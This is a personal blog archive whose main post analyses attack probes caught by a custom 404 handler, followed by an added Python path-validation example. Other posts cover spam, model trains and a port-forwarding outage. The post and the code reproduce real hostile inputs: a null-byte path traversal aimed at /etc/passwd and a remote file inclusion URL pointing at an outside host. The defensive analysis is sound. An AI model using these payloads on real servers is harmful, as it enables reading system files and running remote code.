Archive for the ‘Odds and Ends’ Category
Under Attack
(or, having fun with a public-facing Internet presence)
So, since I upgraded the main narc.ro site, I got a custom 404 handler in the bargain — one that emails me whenever it’s hit. Okay, so it initially sent 500 Internal Server Error, but I’ve fixed that part.
Anyway, the result of this is that I get a whole bunch of very fun emails when people try to hit pages on narc.ro that don’t exist, such as:
- http://www.narc.ro//gazelle/?template=../../../../../../../../../../../../../etc/passwd%00
- http://86.104.40.152/roundcube//bin/msgimport
- http://www.narc.ro/gazelle/?template=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt%3f%3f
I hope I don’t have to tell you not to visit those links — they don’t do anything (except email me, which is annoying).
I’m particularly interested in the first on that list, which is also the most recent. The theoretical narc.ro/gazelle path would have been /opt/www/vhosts/www.narc.ro/htdocs/gazelle. Let’s count the ../ segments in the path our attacker tried: 13 of them, more than enough to climb out of that 6-level-deep directory and into / (once you are at /, any further ../ goes nowhere, so the attacker simply overshoots to be safe). The trailing %00 is a URL-encoded null byte: if the script appends something like a file extension to the template name, a C-based runtime stops reading the string at the null, so what actually gets opened is /etc/passwd. And I probably don’t have to tell you that /etc/passwd is a file you really want to guard pretty well, since it has all your users in it (/etc/shadow has the hashed passwords, too, but that one’s protected, so an ordinary user, the apache user included, is unable to read it).
So, what protected me in this case? Firstly, the fortunate fact that the script the attacker was trying to hit doesn’t exist; and secondly, that wherever I have scripts that take user input for a path (for instance, img.narc.ro works like that), I’ve been careful to put in protection against relative path inputs like that one. http://img.narc.ro/../ just won’t work.
This is a semi-adequate level of protection for me, since I write my own scripts — I don’t have to worry about any mistakes made by anyone other than myself, and I’m pretty careful around this stuff.
But note that I am some random corner of the Internet almost nobody knows about, and I’m still getting attacked. That means no matter who you are, if you’re serving Web content, you must take precautions. And even if you’re the only developer on the system, you should still do your best to contain the threat. Defense in depth should be your key phrase. That’s why I’m currently looking into mod_chroot for my Apache2 installation. Your solution may be different, but have one, or at the very least, be aware that you will be attacked, and have some plan to recover from that if, or when, an attack is successful.
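What such a path check can look like, as an added example that is not the author’s own script (the post does not say what language those scripts are in; this is Python, and the template root, the “.tpl” suffix and the helper names are assumptions). It runs the three probe URLs quoted above through the check, and also shows where the first one would land if there were no check at all:

```python
"""Vet a user-supplied 'template' parameter so it cannot leave the template
directory.  Added example, not the site's own code.  Assumptions: templates
live under TEMPLATE_ROOT and the script appends TEMPLATE_SUFFIX to the name."""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# The post says a real /gazelle/ would have lived here; assumed to hold templates.
TEMPLATE_ROOT = "/opt/www/vhosts/www.narc.ro/htdocs/gazelle"
TEMPLATE_SUFFIX = ".tpl"   # assumption: the script appends an extension itself
# Allow-list: letters, digits, underscore, hyphen and '/' for subdirectories.
# No dots at all, so neither '..' nor a smuggled extension can get through.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_/-]*$")

# The three URLs quoted in the post, as constructed input.  The first is
# written with its thirteen '../' segments built by repetition.
PROBES = [
    "http://www.narc.ro//gazelle/?template=" + "../" * 13 + "etc/passwd%00",
    "http://86.104.40.152/roundcube//bin/msgimport",
    "http://www.narc.ro/gazelle/?template=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt%3f%3f",
]


class BadTemplatePath(ValueError):
    """Raised when a template name fails vetting."""


def template_param(url):
    """Return the percent-decoded 'template' query value ('' if absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("template", [""])[0]


def parent_segments(value):
    """How many '..' path segments the value contains."""
    return value.split("/").count("..")


def where_it_would_land(value, root=TEMPLATE_ROOT):
    """What a naive open(root + '/' + value) would touch, with no checks.
    Purely lexical: the null byte ends the string, '..' climbs, and extra
    '..' above '/' is discarded, exactly as the attacker intends."""
    truncated = value.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(root, truncated))


def vet_template(value):
    """Return a short rejection reason, or None if the value is acceptable."""
    if not value:
        return "empty template name"
    if "\x00" in value:
        return "null byte (suffix-truncation attempt)"
    if "://" in value or value.lower().startswith(("http:", "https:", "ftp:", "php:", "data:")):
        return "URL scheme (remote file inclusion attempt)"
    if value.startswith("/"):
        return "absolute path"
    if ".." in value.split("/"):
        return "parent-directory segment (path traversal attempt)"
    if not SAFE_NAME.match(value):
        return "character outside allow-list"
    return None


def resolve_template(value, root=TEMPLATE_ROOT):
    """Map a vetted template name onto a file under root."""
    reason = vet_template(value)
    if reason:
        raise BadTemplatePath(reason)
    candidate = posixpath.normpath(posixpath.join(root, value + TEMPLATE_SUFFIX))
    # Belt and braces: even if a check above is loosened later, refuse anything
    # whose canonical path is not inside root.  (Use os.path.realpath as well
    # on a live system if symlinks under root are a concern.)
    if posixpath.commonpath([root, candidate]) != root:
        raise BadTemplatePath("resolves outside template root")
    return candidate


if __name__ == "__main__":
    for url in PROBES:
        value = template_param(url)
        print(url)
        print("  template param :", repr(value))
        print("  '..' segments  :", parent_segments(value))
        print("  unchecked open :", where_it_would_land(value))
        print("  verdict        :", vet_template(value) or "accepted")
    print("legitimate name ->", resolve_template("themes/dark"))
```

The order of the checks matters only for the reason reported; the allow-list regex alone would reject every probe above, and the final `commonpath` test is what saves you the day someone relaxes the regex to admit dots.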
Spam Break?
Apparently, spammers’ botnets didn’t work very hard over this holiday season — I only got two spam emails between the 25th and today. Quite interesting.
TRAINing Around
I’ve been promising pictures of my small collection of H0 scale trains for a while now, so here come some pictures (click the pictures for larger versions):
Things to say to bad Internet users
I get really irritated by people who write every paragraph as one single very very long sentence that looks like they’re on crack and really can’t stop typing because if they did they would get taken away by the IRS man and then be forced to stare at a wall for 15 hours a day and the wall would stare back ’cause there’s mini-micro-cameras in the walls that feed to a huge wall-sized TV that everybody in the local town square looks at. *takes a deep breath*
For the girls among them, I finally have something to say: “You can’t be female, you have no periods!” Evidently, this can work similarly on a male (“You must be a guy [...]”).
I’m very amused by what that says about me… does it make me seem female?
On a more serious side-note, what irritates me about people who spell and punctuate badly is that I tend to be chameleonic, in that I pick up other people’s accents and such, and I’m terribly afraid of ending up with their bad spelling. And grammar. And punctuation. Which is why correcting them is therapeutic for me. So, um… anyone need a copy editor?
Lost port forward?
Looks like Starfleet stopped forwarding port 25 at some point very recently. I wish I could say what went wrong, but I have no clue. The other forwards (like port 80) still worked, so everything was nice and accessible… except for SMTP. Except for *my e-mail*!
I noticed it had been up for 27 days. So I rebooted it. Let’s see if that solved the issue…
Update: Okay, now I’m pissed. That didn’t solve anything. Let’s try rebooting Hermes…
Update 2: Well, at this point, I’ve rebooted everything, and I’m pretty sure the problem’s not on my end. I guess I’m gonna have to ask around later. Or, you know, it might actually be working, heck if I know. It’s times like these I wish I had a host outside my immediate network to use for a nice telnet. Not too far outside my network, though. For far outside my network I have the Canadian folks’ servers (though I probably shouldn’t be using them).
Update 3: It started working again after about 24 hours. No explanation for what went wrong. *shrug*